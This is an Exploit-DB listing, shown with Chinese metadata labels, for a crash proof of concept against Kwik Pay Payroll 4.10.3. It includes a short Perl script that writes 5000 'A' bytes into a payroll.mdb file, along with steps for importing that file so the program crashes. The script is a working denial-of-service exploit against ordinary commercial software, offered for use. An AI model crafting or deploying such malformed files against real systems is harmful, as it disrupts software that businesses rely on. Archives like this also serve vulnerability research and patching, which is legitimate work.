Kwik Pay Payroll 4.10.3 – ‘.mdb’ Crash (PoC)

  • 作者: anonymous
    日期: 2010-04-01
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12000/
  • # Exploit Title: Kwik Pay Payroll .mdb Crash PoC
    # Date: April 1, 2010
    # Version: 4.10.3
    # Tested on: Windows XP SP3
    # Cost: 100.00 AU
    # Author: [anonymous]
    # Site: [http://www.setfreesecurity.com]
    # 
    # Usage: Run Script, Open the program
    # File -> Import Payroll Data 
    # Select From Data Source Drop-Down: Kwik-Pay Payroll Data 
    # Browse and Import your .mdb File
    #
    # **********************************************
    # ** It took 33 years to save my life **
    # ** thats 11 more years to make things right **
    # **********************************************
    # My hat goes off to the Exploit-DB Crew!
    #!/usr/bin/perl
    print "Broke as a Joke. . .\n";
    
    my $data = "\x41" x 5000;
    my $money = "payroll.mdb";
    
    open (FILE, ">$money");
    print FILE "$data";
    
    print "\nShow me the money!\n";